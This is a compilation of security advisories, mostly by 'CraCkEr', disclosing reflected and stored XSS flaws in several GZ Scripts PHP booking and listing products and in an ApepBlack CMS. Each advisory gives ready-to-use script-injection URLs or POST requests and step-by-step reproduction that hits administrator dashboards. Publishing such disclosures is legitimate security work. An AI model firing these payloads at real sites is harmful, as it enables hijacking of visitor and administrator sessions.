<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/gz-forum-script.html │<br />│ Vendor : GZ Scripts │<br />│ Software : GZ Forum Script 1.8 │<br />│ Vuln Type: Reflected XSS - Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Reflected XSS │<br />│ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />│ │<br />│ Stored XSS │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │ <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /preview.php<br /><br />GET 'catid' parameter is vulnerable to RXSS<br /><br />http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a<br /><br /><br />Path: /preview.php<br /><br />GET 'topicid' parameter is vulnerable to RXSS<br /><br />http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2<br /><br /><br /><br /><br />## Stored XSS<br /><br />-----------------------------------------------<br />POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1<br /><br />-----------------------------39829578812616571248381709325<br />Content-Disposition: form-data; name="free_name"<br /><br /><script>alert(1)</script><br />-----------------------------39829578812616571248381709325<br />Content-Disposition: form-data; name="topic"<br /><br /><script>alert(1)</script><br />-----------------------------39829578812616571248381709325<br />Content-Disposition: form-data; name="topic_message"<br /><br /><script>alert(1)</script><br />-----------------------------39829578812616571248381709325--<br /><br />-----------------------------------------------<br /><br />POST parameter 'free_name' is vulnerable to XSS<br />POST parameter 'topic' is vulnerable to XSS<br />POST parameter 'topic_message' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic)<br />2. Inject your [XSS Payload] in "Name"<br />3. Inject your [XSS Payload] in "Topic Title "<br />4. Inject your [XSS Payload] in "Topic Message"<br />5. Submit<br /><br />4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on<br /><br />5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard)<br />6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/php-gz-hotel-booking-script.html │<br />│ Vendor : GZ Scripts │<br />│ Software : GZ Hotel Booking Script 1.8 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │ <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />-----------------------------------------------<br />POST /PHPGZHotelBooking/load.php?controller=GzFront&action=booking_details HTTP/1.1<br /><br />first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&terms=1&date_range=29.06.2023+-+30.06.2023&date_to=30.06.2023&date_from=29.06.2023&adults=1&children=1&order=&sort=&fromNumber=&toNumber=&room_id%5B4%5D=1&room_id%5B3%5D=0&room_id%5B2%5D=0&room_id%5B1%5D=0&adults_arr%5B4%5D%5B1%5D=1&children_arr%5B4%5D%5B1%5D=1<br />-----------------------------------------------<br /><br />POST parameter 'first_name' is vulnerable to XSS<br />POST parameter 'second_name' is vulnerable to XSS<br />POST parameter 'phone' is vulnerable to XSS<br />POST parameter 'address_1' is vulnerable to XSS<br />POST parameter 'country' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. As a [Guest User] Choose any [Room] for Booking<br />2. Inject your [XSS Payload] in "First Name"<br />3. Inject your [XSS Payload] in "Last Name"<br />4. Inject your [XSS Payload] in "Phone"<br />5. Inject your [XSS Payload] in "Address Line 1"<br />6. Inject your [XSS Payload] in "Country"<br /><br /><br />7. Accept with terms & Press [Booking]<br /> XSS Fired on Local User Browser<br /><br />8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)<br /> XSS Will Fire and Executed on his Browser<br /><br />9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)<br /> XSS Will Fire and Executed on his Browser<br /> <br />10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)<br /> <br /> <br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/ticket-booking-script.html │<br />│ Vendor : GZ Scripts │<br />│ Software : Ticket Booking Script 1.8 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │ <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />-----------------------------------------------<br />POST /TicketBookingScript/load.php?controller=GzFront&action=booking_details&cid=all&layout=calendar&show_header=T&local=3 HTTP/1.1<br /><br />title=mr&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=wjrgvb&terms=1&ticket_id%5B%5D=532&event_id=3<br />-----------------------------------------------<br /><br />POST parameter 'first_name' is vulnerable to XSS<br />POST parameter 'second_name' is vulnerable to XSS<br />POST parameter 'phone' is vulnerable to XSS<br />POST parameter 'address_1' is vulnerable to XSS<br />POST parameter 'country' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. As a [Guest User] Choose any [Event] for Booking - Select seats <br />2. Inject your [XSS Payload] in "First Name"<br />3. Inject your [XSS Payload] in "Last Name"<br />4. Inject your [XSS Payload] in "Phone"<br />5. Inject your [XSS Payload] in "Address Line 1"<br />6. Inject your [XSS Payload] in "Country"<br /><br /><br />7. Accept with terms & Press [Booking]<br /> XSS Fired on Local User Browser<br /><br />8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)<br /> XSS Will Fire and Executed on his Browser<br /><br />9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)<br /> XSS Will Fire and Executed on his Browser<br /> <br />10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)<br /> XSS Will Fire and Executed on his Browser<br /> <br /> <br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/php-gz-appointment-scheduling-script.html │<br />│ Vendor : GZ Scripts │<br />│ Software : GZ Appointment Scheduling 1.8 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │ <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />-----------------------------------------------<br />POST /PHPGZAppointment/load.php?controller=GzFront&action=step5 HTTP/1.1<br /><br />service_id=1&employee_id=1&timeslot=1688119200&lang=3&date=2023-06-30&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=murimy&terms=1&lang=3<br />-----------------------------------------------<br /><br />POST parameter 'first_name' is vulnerable to XSS<br />POST parameter 'second_name' is vulnerable to XSS<br />POST parameter 'phone' is vulnerable to XSS<br />POST parameter 'address_1' is vulnerable to XSS<br />POST parameter 'country' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. As a [Guest User] Choose any [Employee] & Select the Day and the Time<br />2. Inject your [XSS Payload] in "First Name"<br />3. Inject your [XSS Payload] in "Last Name"<br />4. Inject your [XSS Payload] in "Phone"<br />5. Inject your [XSS Payload] in "Address Line 1"<br />6. Inject your [XSS Payload] in "Country"<br /><br /><br />7. Accept with terms & Press [Booking]<br /> XSS Fired on Local User Browser<br /><br />8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php#!/GzAdmin/home/)<br /> XSS Will Fire and Executed on his Browser<br /><br />9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php#!/GzBooking/index/)<br /> XSS Will Fire and Executed on his Browser<br /> <br />10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php#!/GzInvoice/index/)<br /> XSS Will Fire and Executed on his Browser<br /> <br /> <br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/property-listing-script.html │<br />│ Vendor : GZ Scripts │<br />│ Software : Property Listing Script 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br /><br />Path: /preview.php<br /><br />GET 'page' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?&page=j5wno%22%3e%3cscript%3ealert(1)%3c%2fscript%3epjd8c&sort_by=ascprice<br /><br /><br />Path: /preview.php<br /><br />GET 'layout' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?layout=gridpv063%22%3e%3cscript%3ealert(1)%3c%2fscript%3eg46bc<br /><br /><br />Path: /preview.php<br /><br />GET 'sort_by' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?&page=1&sort_by=orbb0%22%3e%3cscript%3ealert(1)%3c%2fscript%3edhv9a<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/car-listing-script-php.html │<br />│ Vendor : GZ Scripts │<br />│ Software : Car Listing Script 1.8 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br /><br />Path: /preview.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />http://website/preview.php/n42rk"><script>alert(1)</script>i2rgn?controller=GzFront&action=detail&car_id=10<br /><br /><br />Path: /preview.php<br /><br />GET 'page' parameter is vulnerable to RXSS<br /><br />http://website/preview.php?&page=tdnzc%22%3e%3cscript%3ealert(1)%3c%2fscript%3eq4n0s&sort_by=old_listing<br /><br /><br />Path: /preview.php<br /><br />GET 'sort_by' parameter is vulnerable to RXSS<br /><br />http://website/preview.php?&page=1&sort_by=bpei5%22%3e%3cscript%3ealert(1)%3c%2fscript%3erfgo3<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/php-vacation-rental-script.html │<br />│ Vendor : GZ Scripts │<br />│ Software : Vacation Rental Script 1.8 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /preview.php<br /><br />GET 'page' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?&page=m47wf%22%3e%3cscript%3ealert(1)%3c%2fscript%3el35t9&sort_by=date<br /><br /><br />Path: /preview.php<br /><br />GET 'layout' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?layout=gridbhclb%22%3e%3cscript%3ealert(1)%3c%2fscript%3er8p4d<br /><br /><br />Path: /preview.php<br /><br />GET 'sort_by' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?&page=1&sort_by=bg8c8%22%3e%3cscript%3ealert(1)%3c%2fscript%3elbm07<br /><br /><br />Path: /preview.php<br /><br />GET 'property_id' parameter is vulnerable to RXSS<br /><br />https://website/preview.php?controller=GzFront&action=detail&property_id=1nob9z%22%3e%3cscript%3ealert(1)%3c%2fscript%3evts7c<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ApepBlack Premium Checker cms 3.0.5 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | <br />| # Vendor : https://new.apepblack.net/login | <br />| # Dork : A tool made with by ApepBlack |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /login?password=pass&redirect=1'"()%26%25<acx><script>alert(/indoushka/);</script>&username=fkxypeoi<br /><br />[+] https://127.0.0.1/new.apepblack.net/login?password=pass&redirect=1%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E&username=fkxypeoi<br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/event-booking-calendar.html │<br />│ Vendor : GZ Scripts │<br />│ Software : Event Booking Calendar 1.8 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │ <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />-----------------------------------------------<br />POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1<br /><br />payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1<br />-----------------------------------------------<br /><br />POST parameter 'first_name' is vulnerable to XSS<br />POST parameter 'second_name' is vulnerable to XSS<br />POST parameter 'phone' is vulnerable to XSS<br />POST parameter 'address_1' is vulnerable to XSS<br />POST parameter 'country' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on it & Press [Booking]<br />2. Inject your [XSS Payload] in "First Name"<br />3. Inject your [XSS Payload] in "Last Name"<br />4. Inject your [XSS Payload] in "Phone"<br />5. Inject your [XSS Payload] in "Address Line 1"<br />6. Inject your [XSS Payload] in "Country"<br /><br /><br />7. Accept with terms & Press [Booking]<br /> XSS Fired on Local User Browser<br /><br />8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)<br /> XSS Will Fire and Executed on his Browser<br /><br />9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)<br /> XSS Will Fire and Executed on his Browser<br /> <br />10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)<br /> XSS Will Fire and Executed on his Browser<br /> <br /> <br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/time-slot-booking-calendar-php.html │<br />│ Vendor : GZ Scripts │<br />│ Software : Time Slot Booking Calendar 1.8 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │ <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />-----------------------------------------------<br />POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1<br /><br />promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1<br />-----------------------------------------------<br /><br />POST parameter 'first_name' is vulnerable to XSS<br />POST parameter 'second_name' is vulnerable to XSS<br />POST parameter 'phone' is vulnerable to XSS<br />POST parameter 'address_1' is vulnerable to XSS<br />POST parameter 'country' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on [+] near Start/End Time - Press [Booking]<br />2. Inject your [XSS Payload] in "First Name"<br />3. Inject your [XSS Payload] in "Last Name"<br />4. Inject your [XSS Payload] in "Phone"<br />5. Inject your [XSS Payload] in "Address Line 1"<br />6. Inject your [XSS Payload] in "Country"<br /><br /><br />7. Accept with terms & Press [Booking]<br /> XSS Fired on Local User Browser<br /><br />8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)<br /> XSS Will Fire and Executed on his Browser<br /><br />9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)<br /> XSS Will Fire and Executed on his Browser<br /> <br />10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)<br /> XSS Will Fire and Executed on his Browser<br /> <br /> <br />[-] Done<br /></code></pre>